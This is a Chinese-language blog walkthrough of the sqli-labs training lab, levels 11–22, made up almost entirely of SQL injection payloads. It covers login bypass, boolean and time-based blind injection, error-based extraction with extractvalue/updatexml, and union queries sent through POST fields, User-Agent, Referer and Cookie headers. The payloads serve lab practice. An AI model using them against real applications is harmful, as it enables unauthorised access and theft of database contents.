sqli-labs less11-15

  1. sqli-labs less11-15
    1. less11
    2. less12
    3. less13
    4. less14
    5. Less-16
    6. less17

sqli-labs less11-15

[TOC]

less11

uname=1’ or 1=1 # &passwd=x

less12

uname=1”) or 1=1 # &passwd=x

less13

username:1’
Password: (随便输)
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘12’) LIMIT 0,1’ at line 1
‘) 我们可以知道程序对 id 进行了 ‘) 的处理。

uname=1’) or 1=1 # &passwd=x

less14

uname=admin”and left(database(),1)>’a’#&passwd=1&submit=Submit

###less15POST型基于时间盲注
uname=admin’and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Subm
it

Less-16

uname=”) or 1=1#&passwd=x

uname=”) or if(length(database())=8,1,sleep(2))#&passwd=x

less17

Username:admin
Password:1’ You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ‘admin’’
at line 1
可以看到 admin’’ 说明在对密码的处理过程中使用的是 ‘’ 。
接下来利用盲注进行注入。
这里首先演示一下报错类型的盲注。
uname=admin&passwd=1’ and extractvalue(1,concat(0x7e,(select @@version),0x7e))#

Less-18 Header Injection- Error Based- string
在header里的User-Agent后跟上payload:
‘ or updatexml(1,concat(0x5e,(select database() ),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=”security” limit 0,1),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_name=”emails” limit 1,1),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select email_id from emails limit 0,1),0x5e),1),”,”)#

Less-19 Header Injection- Referer- Error Based- string
在header里的Referer后跟上payload:
‘ or updatexml(1,concat(0x5e,(select database() ),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=”security” limit 0,1),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_name=”emails” limit 0,1),0x5e),1),”,”)#
‘ or updatexml(1,concat(0x5e,(select email_id from emails limit 0,1),0x5e),1),”,”)#

Less-20 Cookie Injection- Error Based- string
在header里的Cookie附上payload:
uname=admin’ order by 3#
uname=x’ union select 1,database(),3#
uname=x’ union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema=”security” limit 0,1),0x5e),3 #
uname=x’ union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name=”emails” limit 1,1),0x5e),3 #
uname=x’ union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #

Less-21 Cookie Injection- Error Based- complex - string
这里Cookie设置为以下payload的base64编码形式即可
uname=admin’) order by 3#
uname=x’) union select 1,database(),3#
uname=x’) union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema=”security” limit 0,1),0x5e),3 #
uname=x’) union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name=”emails” limit 1,1),0x5e),3 #
uname=x’) union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #

Less-22 Cookie Injection- Error Based- Double Quotes - string
这里Cookie设置为以下payload的base64编码形式即可
uname=admin” order by 3#
uname=x” union select 1,database(),3#
uname=x” union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema=”security” limit 0,1),0x5e),3 #
uname=x” union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name=”emails” limit 1,1),0x5e),3 #
uname=x” union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:sqli-labs less11-15

文章字数:648

本文作者:Mang0

发布时间:2018-04-02, 16:15:38

最后更新:2018-10-15, 08:40:51

原始链接:http://mang0.me/archis/ced895c1/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏